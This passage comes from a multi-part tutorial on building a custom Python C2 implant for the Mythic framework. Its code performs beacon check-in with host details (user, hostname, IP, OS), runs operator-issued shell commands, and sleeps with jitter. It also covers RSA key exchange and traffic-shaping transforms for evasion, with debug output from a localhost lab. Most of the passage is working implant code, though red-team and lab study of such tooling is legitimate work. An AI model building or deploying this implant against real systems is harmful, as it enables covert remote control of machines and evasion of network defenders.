Print stamped-in configuration at startup so the operator can immediately
confirm what the builder produced — crypto mode, callback target, profile
values — before any network activity happens.
"""
print("\n" + "=" * 60)
print("[DEBUG] PYRITE STARTUP CONFIGURATION")
print("=" * 60)
print(f" Callback: {BASE_URL}")
print(f" Payload UUID: {PAYLOAD_UUID}")
print(f" Interval: {CALLBACK_INTERVAL}s Jitter: {CALLBACK_JITTER}%")
print(f" Kill date: {KILL_DATE_STR or '(none)'}")
print()
if AESPSK and USE_EKE:
print(f" AESPSK: {AESPSK[:20]}...")
print(f" USE_EKE: True")
print(f" Crypto mode: EKE — staging_rsa exchange with AESPSK,")
print(f" then per-session key negotiated via RSA")
elif AESPSK:
print(f" AESPSK: {AESPSK[:20]}...")
print(f" USE_EKE: False")
print(f" Crypto mode: Static PSK — AESPSK used directly for all traffic")
else:
print(f" AESPSK: (not set)")
print(f" USE_EKE: False")
print(f" Crypto mode: Plaintext — no encryption")
print()
print(f" POST URIs: {POST_URIS}")
print(f" POST location: {POST_MSG_LOC}" + (f" name={POST_MSG_NAME!r}" if POST_MSG_NAME else ""))
print(f" POST xforms: {[t['action'] for t in POST_TRANSFORMS] or '(none)'}")
print(f" GET URIs: {GET_URIS}")
print(f" GET location: {GET_MSG_LOC}" + (f" name={GET_MSG_NAME!r}" if GET_MSG_NAME else ""))
print(f" GET xforms: {[t['action'] for t in GET_TRANSFORMS] or '(none)'}")
print("=" * 60 + "\n", flush=True)
def do_checkin() -> str:
"""
Perform the full checkin sequence and return the callbackUUID.
Branches on USE_EKE and AESPSK — both stamped in at build time:
USE_EKE=True → staging_rsa exchange (AESPSK) → session key → checkin
USE_EKE=False, AESPSK set → static PSK checkin directly with PAYLOAD_UUID
USE_EKE=False, no AESPSK → plaintext checkin with PAYLOAD_UUID
All post-checkin messages use CALLBACK_UUID + SESSION_KEY (EKE),
CALLBACK_UUID + AESPSK (static PSK), or CALLBACK_UUID plaintext.
"""
arch = "x64" if sys.maxsize > 2**32 else "x86"
try:
user = os.getlogin()
except Exception:
user = os.environ.get("USER", os.environ.get("USERNAME", "unknown"))
checkin_data = {
"action": "checkin",
"ip": get_ip(),
"os": platform.platform(),
"user": user,
"host": socket.gethostname(),
"pid": os.getpid(),
"uuid": PAYLOAD_UUID,
"architecture": arch,
"domain": "",
"integrity_level": 2,
"external_ip": "",
"encryption_key": "",
"decryption_key": "",
}
if USE_EKE:
print(f"[DEBUG] CHECKIN: EKE mode")
print(f"[DEBUG] Phase 1 — staging_rsa (key: AESPSK {AESPSK[:16]}...)")
temp_uuid, session_key = do_staging_rsa()
print(f"[DEBUG] staging_rsa OK")
print(f"[DEBUG] tempUUID: {temp_uuid}")
print(f"[DEBUG] SESSION_KEY: {session_key[:16]}... (negotiated at runtime, not in binary)")
print(f"[DEBUG] Phase 2 — checkin (outer UUID: tempUUID, key: SESSION_KEY)")
response = send_message(temp_uuid, checkin_data, use_get=False)
elif AESPSK:
print(f"[DEBUG] CHECKIN: Static PSK mode (key: {AESPSK[:16]}...)")
response = send_message(PAYLOAD_UUID, checkin_data, use_get=False)
else:
print(f"[DEBUG] CHECKIN: Plaintext mode")
response = send_message(PAYLOAD_UUID, checkin_data, use_get=False)
if response.get("status") == "success":
callback_uuid = response["id"]
post_checkin_key = (
"SESSION_KEY" if SESSION_KEY else
"AESPSK" if AESPSK else
"plaintext"
)
print(f"[DEBUG] CHECKIN OK — callbackUUID: {callback_uuid}")
print(f"[DEBUG] All subsequent messages: {callback_uuid} + {post_checkin_key}", flush=True)
return callback_uuid
raise RuntimeError(f"Checkin failed: {response}")
# ─────────────────────────────────────────────────────────────────────────────
# Task Loop — Batched
# ─────────────────────────────────────────────────────────────────────────────
def queue_response(task_id: str, output: str,
completed: bool = True, status: str = "success") -> None:
"""
Queue a task response to be sent on the next get_tasking call.
Per the Mythic get_tasking docs, responses can be included directly
in the get_tasking message rather than requiring a separate post_response,
halving the number of round trips per sleep interval.
"""
_pending_responses.append({
"task_id": task_id,
"user_output": output,
"completed": completed,
"status": status,
})
def queue_error(task_id: str, error_msg: str) -> None:
# Per the post_response docs, status strings starting with "error:"
# turn the status label red in the Mythic UI.
queue_response(task_id, error_msg, completed=True,
status="error: " + error_msg)
def get_tasking() -> list:
"""
Poll for all pending tasks and include any queued responses from the
previous execution cycle in the same request.
Per the Mythic get_tasking docs:
tasking_size: -1 means return all pending tasks
responses key allows piggybacking results onto the tasking request
"""
global _pending_responses
msg = {
"action": "get_tasking",
"tasking_size": -1,
}
if _pending_responses:
msg["responses"] = _pending_responses
_pending_responses = []
# Use GET verb for get_tasking if the profile defines a GET block
# with a different URI than the POST block. Otherwise use POST.
use_get = (GET_URI != f"/{POST_URI}" and GET_URI != "/")
return send_message(CALLBACK_UUID, msg, use_get=use_get).get("tasks", [])
# ─────────────────────────────────────────────────────────────────────────────
# Command Dispatch
# ─────────────────────────────────────────────────────────────────────────────
# ##COMMAND_CODE_INSERT##
COMMAND_MAP = {
"shell": execute_shell,
"exit": execute_exit,
}
def dispatch_task(task: dict) -> None:
task_id = task["id"]
command = task["command"]
raw_params = task.get("parameters", "")
# Per the Mythic get_tasking docs, parameters is always a JSON string
try:
parsed = json.loads(raw_params) if raw_params else {}
except json.JSONDecodeError:
queue_error(task_id, f"Failed to parse task parameters: {raw_params!r}")
return
handler = COMMAND_MAP.get(command)
if handler is None:
queue_error(task_id, f"Unknown command: {command}")
return
try:
if command == "exit":
queue_response(task_id, "Exiting.")
# Flush queued responses before exiting — os._exit() is immediate
if _pending_responses:
send_message(CALLBACK_UUID, {
"action": "post_response",
"responses": _pending_responses,
}, use_get=False)
handler()
else:
queue_response(task_id, handler(parsed.get("command", "")))
except Exception:
queue_error(task_id, traceback.format_exc())
# ─────────────────────────────────────────────────────────────────────────────
# Sleep with Jitter
# ─────────────────────────────────────────────────────────────────────────────
def sleep_with_jitter(base_seconds: int, jitter_pct: int) -> None:
jitter_range = base_seconds * (jitter_pct / 100.0)
actual = base_seconds + random.uniform(-jitter_range, jitter_range)
time.sleep(max(actual, 0.5))
# ─────────────────────────────────────────────────────────────────────────────
# Main Loop
# ─────────────────────────────────────────────────────────────────────────────
def main():
global CALLBACK_UUID
debug_startup()
check_kill_date()
while True:
try:
CALLBACK_UUID = do_checkin()
break
except Exception as e:
print(f"[ERROR] Checkin failed: {e}", flush=True)
traceback.print_exc()
time.sleep(CALLBACK_INTERVAL)
while True:
check_kill_date()
try:
tasks = get_tasking()
for task in tasks:
dispatch_task(task)
except Exception as e:
print(f"[ERROR] Task loop: {e}", flush=True)
sleep_with_jitter(CALLBACK_INTERVAL, CALLBACK_JITTER)
if __name__ == "__main__":
main()
7. Generating an httpx Payload
- Edit
pyrite_httpx.jsonto set your actual callback host and port in the UI fields (not in the file) - In Mythic UI → Payloads → Generate New Payload
- Select pyrite, then select httpx as the C2 profile
- Upload
pyrite_httpx.jsonwhen prompted for the profile config — this is required. Missing or malformed file producesMissing name for agent variation - Fill in callback host, port, interval, jitter, and killdate in the remaining UI fields
For lab use keep the callback host ashttp://. Mythic-layer AES-256 encryption viamythic_encrypts = Trueprotects message content regardless of whether transport TLS is used. Transport TLS requires the httpx server container to be configured with a certificate — refer to the httpx repository for that configuration.
8. Verifying the Changes
8.1 Debug Instrumentation
Add a debug_startup() call at the top of main() to print the stamped-in configuration before any network activity, so you can confirm what the builder produced:
def debug_startup() -> None:
"""Print stamped-in configuration so the operator can confirm what was built."""
print("\n" + "="*60)
print("[DEBUG] PYRITE STARTUP CONFIGURATION")
print("="*60)
print(f" Callback: {BASE_URL}")
print(f" Payload UUID: {PAYLOAD_UUID}")
print(f" Kill date: {KILL_DATE_STR or '(none)'}")
print()
print(f" AESPSK set: {'YES — ' + AESPSK[:16] + '...' if AESPSK else 'NO (plaintext mode)'}")
print(f" USE_EKE: {USE_EKE}")
if AESPSK and USE_EKE:
print(f" Crypto mode: EKE — staging_rsa exchange, then per-session key")
elif AESPSK:
print(f" Crypto mode: Static PSK — AESPSK used for all traffic")
else:
print(f" Crypto mode: Plaintext — no encryption")
print()
print(f" POST URIs: {POST_URIS}")
print(f" POST msg loc: {POST_MSG_LOC}" + (f" name={POST_MSG_NAME!r}" if POST_MSG_NAME else ""))
print(f" POST transforms:{[t['action'] for t in POST_TRANSFORMS] or '(none)'}")
print(f" GET URIs: {GET_URIS}")
print(f" GET msg loc: {GET_MSG_LOC}" + (f" name={GET_MSG_NAME!r}" if GET_MSG_NAME else ""))
print(f" GET transforms: {[t['action'] for t in GET_TRANSFORMS] or '(none)'}")
print("="*60 + "\n")
Add a debug version of do_checkin that shows the EKE stages as they happen:
def do_checkin() -> str:
arch = "x64" if sys.maxsize > 2**32 else "x86"
try:
user = os.getlogin()
except Exception:
user = os.environ.get("USER", os.environ.get("USERNAME", "unknown"))
checkin_data = {
"action": "checkin",
"ip": get_ip(),
"os": platform.platform(),
"user": user,
"host": socket.gethostname(),
"pid": os.getpid(),
"uuid": PAYLOAD_UUID,
"architecture": arch,
"domain": "",
"integrity_level": 2,
"external_ip": "",
"encryption_key": "",
"decryption_key": "",
}
if USE_EKE:
print("[DEBUG] CHECKIN MODE: EKE")
print(f"[DEBUG] Step 1: staging_rsa exchange using static AESPSK ({AESPSK[:16]}...)")
temp_uuid, session_key = do_staging_rsa()
print(f"[DEBUG] staging_rsa complete")
print(f"[DEBUG] tempUUID: {temp_uuid}")
print(f"[DEBUG] SESSION_KEY: {session_key[:16]}... (negotiated, not in binary)")
print(f"[DEBUG] Step 2: checkin using tempUUID + SESSION_KEY")
response = send_message(temp_uuid, checkin_data, use_get=False)
elif AESPSK:
print(f"[DEBUG] CHECKIN MODE: Static PSK ({AESPSK[:16]}...)")
response = send_message(PAYLOAD_UUID, checkin_data, use_get=False)
else:
print("[DEBUG] CHECKIN MODE: Plaintext")
response = send_message(PAYLOAD_UUID, checkin_data, use_get=False)
if response.get("status") == "success":
callback_uuid = response["id"]
print(f"[DEBUG] CHECKIN SUCCESS")
print(f"[DEBUG] callbackUUID: {callback_uuid}")
print(f"[DEBUG] All subsequent messages will use this UUID"
+ (" + SESSION_KEY" if SESSION_KEY else " + AESPSK" if AESPSK else " (plaintext)"))
return callback_uuid
raise RuntimeError(f"Checkin failed: {response}")
And the debug send_message which shows the active key at each call:
def send_message(uuid_str: str, payload: dict, use_get: bool = False,
override_key: str = None) -> dict:
active_key = override_key or SESSION_KEY or AESPSK
json_body = json.dumps(payload).encode("utf-8")
if active_key:
body = mythic_encrypt(json_body, active_key)
else:
body = json_body
raw = uuid_str.encode("utf-8") + body
wire = base64.b64encode(raw)
if use_get:
transforms = GET_TRANSFORMS
server_transforms = GET_SERVER_TRANSFORMS
url = f"{BASE_URL}{random.choice(GET_URIS)}"
msg_loc = GET_MSG_LOC
msg_name = GET_MSG_NAME
headers = GET_HDRS
method = "GET"
else:
transforms = POST_TRANSFORMS
server_transforms = POST_SERVER_TRANSFORMS
url = f"{BASE_URL}{random.choice(POST_URIS)}"
msg_loc = POST_MSG_LOC
msg_name = POST_MSG_NAME
headers = POST_HDRS
method = "POST"
encoded = apply_transforms(wire, transforms)
# ── DEBUG: print BEFORE sending — visible even if connection fails ────────
key_label = (
f"EKE session ({SESSION_KEY[:16]}...)" if SESSION_KEY else
f"static PSK ({AESPSK[:16]}...)" if AESPSK and not override_key else
f"override ({override_key[:16]}...)" if override_key else
"plaintext"
)
print(f"\n[DEBUG] OUTGOING ({method} {url})")
print(f" outer UUID : {uuid_str}")
print(f" action : {payload.get('action', '?')}")
print(f" key used : {key_label}")
print(f" raw before transforms : {raw[:80]}...")
print(f" wire (base64) : {wire[:80]}...")
print(f" after profile xforms : {encoded[:80]}...")
print(f" encoded head (20) : {encoded[:20]}")
print(f" encoded tail (20) : {encoded[-20:]}")
print(f" placement : {msg_loc}" + (f" name={msg_name!r}" if msg_name else ""))
raw_resp = _place_message(method, url, encoded, msg_loc, msg_name, headers)
decoded = reverse_transforms(raw_resp, server_transforms)
unwrapped = base64.b64decode(decoded + b'====')
print(f"\n[DEBUG] INCOMING")
print(f" raw server response : {raw_resp[:80]}...")
print(f" after reverse xforms : {decoded[:80]}...")
print(f" after base64 decode : {unwrapped[:80]}...")
if active_key:
print(f" body is : encrypted (will decrypt with {key_label})")
else:
print(f" body is : plaintext JSON")
# ── END DEBUG ─────────────────────────────────────────────────────────────
resp_body = unwrapped[36:]
if not resp_body:
raise RuntimeError("Empty response — check: sudo ./mythic-cli logs httpx")
if active_key:
resp_body = mythic_decrypt(resp_body, active_key)
return json.loads(resp_body)
Update main() to call debug_startup():
def main():
global CALLBACK_UUID
debug_startup() # ← print config before any network activity
check_kill_date()
...
Example startup output for EKE mode (aes256_hmac + encrypted_exchange_check = true):
============================================================
[DEBUG] PYRITE STARTUP CONFIGURATION
============================================================
Callback: http://127.0.0.1:82
Payload UUID: bb0936fc-b373-462e-8548-52c9cd3614d6
Kill date: 2027-04-07
AESPSK set: YES — ppnuO/i7+EB2HVao...
USE_EKE: True
Crypto mode: EKE — staging_rsa exchange, then per-session key
POST URIs: ['/data']
POST msg loc: body
POST transforms:['base64']
GET URIs: ['/']
GET msg loc: body
GET transforms: ['base64']
============================================================
[DEBUG] CHECKIN MODE: EKE
[DEBUG] Step 1: staging_rsa exchange using static AESPSK (ppnuO/i7+EB2HVao...)
[DEBUG] OUTGOING (POST http://127.0.0.1:82/data)
outer UUID : bb0936fc-b373-462e-8548-52c9cd3614d6
action : staging_rsa
key used : static PSK (ppnuO/i7+EB2HVao...)
raw before transforms : b'bb0936fc-...<binary IV+cipher+HMAC>'...
wire (base64) : b'YmIwOTM2ZmMt...'...
after profile xforms : b'YmIwOTM2ZmMt...'...
placement : body
[DEBUG] INCOMING
...
body is : encrypted (will decrypt with static PSK)
[DEBUG] staging_rsa complete
[DEBUG] tempUUID: 303365-29d8-4d4c-...
[DEBUG] SESSION_KEY: Xgjq3vE9vduJliEd... (negotiated, not in binary)
[DEBUG] Step 2: checkin using tempUUID + SESSION_KEY
[DEBUG] OUTGOING (POST http://127.0.0.1:82/data)
outer UUID : 303365-29d8-4d4c-...
action : checkin
key used : EKE session (Xgjq3vE9vduJliEd...)
...
[DEBUG] CHECKIN SUCCESS
callbackUUID: 558b6c3-2a38-4dfe-...
All subsequent messages will use this UUID + SESSION_KEY
Example startup output for static PSK (aes256_hmac + encrypted_exchange_check = false):
AESPSK set: YES — ppnuO/i7+EB2HVao...
USE_EKE: False
Crypto mode: Static PSK — AESPSK used for all traffic
[DEBUG] CHECKIN MODE: Static PSK (ppnuO/i7+EB2HVao...)
[DEBUG] CHECKIN SUCCESS
callbackUUID: e02388c8-cee5-45db-...
All subsequent messages will use this UUID + AESPSK
Example startup output for plaintext (none):
AESPSK set: NO (plaintext mode)
USE_EKE: False
Crypto mode: Plaintext — no encryption
[DEBUG] CHECKIN MODE: Plaintext
[DEBUG] CHECKIN SUCCESS
callbackUUID: 9d22506b-2dd1-4aff-...
All subsequent messages will use this UUID (plaintext)
8.2 mythic_encrypts = False
With mythic_encrypts = False, send_message skips the mythic_encrypt/mythic_decrypt calls entirely and sends plaintext JSON — the same as Part 1. The httpx container forwards the bytes unchanged and Mythic processes them as plaintext. This requires the operator to select none for the AESPSK parameter, otherwise Mythic will try to decrypt the plaintext blob with the AES key and fail.
mythic_encrypts = False with custom crypto implemented in a translation container is Part 3.
8.3 Functional Verification
Verify the profile is being honoured: With pyrite_httpx.json (body + base64), the agent should POST to /data. Change the profile to location: "query" with name: "filter", regenerate, and confirm the agent sends GET /...?filter=<encoded> instead. This confirms the builder is correctly reading and stamping the profile values.
Verify batched tasking: Queue three shell commands in the Mythic UI before the agent beacons. All three tasks should arrive in a single get_tasking response and all three results piggybacked on the following beacon rather than three separate round trips.
| Symptom | Likely cause |
|---|---|
| Profile generates but agent gets empty response | httpx container failed to load the profile config — check sudo ./mythic-cli logs httpx for Failed to read file from Mythic. Restart with sudo ./mythic-cli restart httpx |
HMAC verification failed on checkin | Almost always caused by empty response body — fix the httpx container first |
HTTP Error 404 on POST to /data | httpx container not running or profile config not loaded. Check logs and restart |
| Agent produces no output at all | Exception being swallowed — ensure main() prints exceptions. Usually a missing pycryptodome or connection refused |
| Command files duplicated in generated agent | Builder insertion marker appeared twice in template — ensure template uses # ##COMMAND_CODE_INSERT## exactly once |
| Port stamped as 80 despite specifying a different port | Domain regex failed to parse callback_domains — add debug print of callback_domains raw value in builder Step 2 |
9. Profile Compatibility and EKE
Complex Malleable Profiles
Our implementation handles the full transform pipeline — xor, base64, base64url, prepend, append, netbios, netbiosu — in both directions. A profile like the Xenon apiclient.json example (message in a query parameter, multiple XOR+base64+prepend/append transforms, multi-URI rotation) works correctly because:
- The agent applies
client.transformson top of the Mythic base64 wire format before sending - The agent reverses
server.transformsafter receiving to unwrap the response - URIs are selected randomly from the
urisarray per request - Message location (
body,query,header,cookie) is fully implemented in_place_message
Encrypted Key Exchange
Our implementation uses RSA-based EKE per the Mythic checkin docs. When the operator selects aes256_hmac, the agent performs a two-phase startup instead of a direct checkin:
Phase 1 — do_staging_rsa() (uses static AESPSK, outer UUID = PayloadUUID):
Agent → Mythic:
Base64( PayloadUUID + AES256(AESPSK,
{"action":"staging_rsa", "pub_key":"<b64 RSA PEM>", "session_id":"<20char>"}) )
Mythic → Agent:
Base64( PayloadUUID + AES256(AESPSK,
{"action":"staging_rsa", "uuid":"<tempUUID>",
"session_key":"<RSAPub(new_32_byte_aes_key)>",
"session_id":"<same 20char>"}) )
The agent decrypts session_key with its RSA private key (PKCS1_OAEP, SHA1, 4096-bit) to get the negotiated AES session key. This is stored as SESSION_KEY.
Phase 2 — do_checkin() (uses SESSION_KEY, outer UUID = tempUUID):
Agent → Mythic:
Base64( tempUUID + AES256(SESSION_KEY, {checkin_data}) )
Mythic → Agent:
Base64( tempUUID + AES256(SESSION_KEY,
{"action":"checkin", "id":"<callbackUUID>", "status":"success"}) )
All subsequent get_tasking and post_response messages use CALLBACK_UUID + SESSION_KEY. The static AESPSK embedded in the binary is only used during the staging exchange — an attacker who extracts the binary can only decrypt the staging messages, not the session traffic.
When the operator selects none, the agent falls through to a plaintext checkin directly with PAYLOAD_UUID — no EKE, no encryption.
10. Summary of Changes: Part 1 → Part 2
| Part 1 (http) | Part 2 (httpx) | |
|---|---|---|
| Profile | http | httpx only |
| Transport (lab) | HTTP plaintext | HTTP plaintext (TLS optional) |
| Key exchange | None — plaintext | RSA EKE → per-session AES-256 key negotiated at runtime |
| Message encryption | None | AES-256-CBC + HMAC-SHA256 using negotiated session key |
mythic_encrypts | False | True |
| Static key in binary | N/A | AESPSK used only for staging exchange, not session traffic |
| Tasks per beacon | 1 | All pending (tasking_size: -1) |
| Response round trips | Separate post_response | Piggybacked on next get_tasking |
| Request shaping | Fixed POST body | Profile-driven — URI, location, transforms from config file |
| URI rotation | Single URI | Random selection from uris array per request |
| Kill date | Not implemented | Checked before each beacon |
Continue to